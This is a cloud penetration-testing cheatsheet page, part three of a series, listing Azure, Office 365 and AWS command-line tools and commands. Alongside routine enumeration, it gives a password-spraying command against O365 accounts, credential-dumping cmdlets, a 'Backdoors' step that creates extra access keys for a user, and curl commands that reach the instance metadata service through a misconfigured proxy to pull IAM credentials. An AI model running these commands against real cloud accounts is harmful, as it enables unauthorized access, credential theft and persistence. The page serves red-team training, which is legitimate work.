Cloud Pen-testing Part -3

## Microsoft Azure & O365 CLI Tool Cheatsheet (Part-3)

### Other Azure & O365 Tools

#### Look for open storage blobs

```powershell
Invoke-EnumerateAzureBlobs -Base $BaseName

Export SSL/TLS certs

Get-AzPasswords -ExportCerts Y

Azure Container Registry dump

Get-AzPasswords
Get-AzACR

PowerZure

Azure security assessment tool

https://github.com/hausec/PowerZure

ROADTools

Framework to interact with Azure AD

https://github.com/dirkjanm/ROADtools

Stormspotter

Red team tool for graphing Azure and Azure AD objects

https://github.com/Azure/Stormspotter

MSOLSpray

Tool to password spray Azure/O365

https://github.com/dafthack

Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020

Amazon Web Services (AWS) CLI Tool Cheatsheet

Authentication

# Set AWS programmatic keys for authentication (use --profile= for a new profile)
aws configure

Open S3 bucket enumeration

List the contents of an S3 bucket

aws s3 ls s3://<bucketname>/

Download contents of a bucket

aws s3 sync s3://bucketname s3-files-dir

Account Information

Get basic account info

aws sts get-caller-identity

List IAM users

aws iam list-users

List IAM roles

aws iam list-roles

List S3 buckets accessible to an account

aws s3 ls

Virtual Machines

List EC2 instances

aws ec2 describe-instances

WebApps & SQL

List WebApps

aws deploy list-applications

### List AWS RDS (SQL)

```shell
aws rds describe-db-instances --region <region name>

Serverless

List Lambda Functions

aws lambda list-functions --region <region>

Look at environment variables set for secrets and analyze code

aws lambda get-function --function-name <lambda function>

Networking

List EC2 subnets

aws ec2 describe-subnets

List EC2 network interfaces

aws ec2 describe-network-interfaces

List DirectConnect (VPN) connections

aws directconnect describe-connections

Backdoors

List access keys for a user

aws iam list-access-keys --user-name <username>

Backdoor account with a second set of access keys

aws iam create-access-key --user-name <username>

Instance Metadata Service URL

http://169.254.169.254/latest/meta-data

Additional IAM credentials possibly available here

http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM Role Name>

Can potentially hit it externally if a proxy service (like Nginx) is being hosted in AWS and misconfigured

curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/metadata/iam/security-credentials/ && echo

IMDS Version 2 has some protections, but these commands can be used to access it

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"

PreviousCloud Pen-testing Part-2 NextCloud Pen-testing Part -4

Last updated 2 years ago

Was this helpful?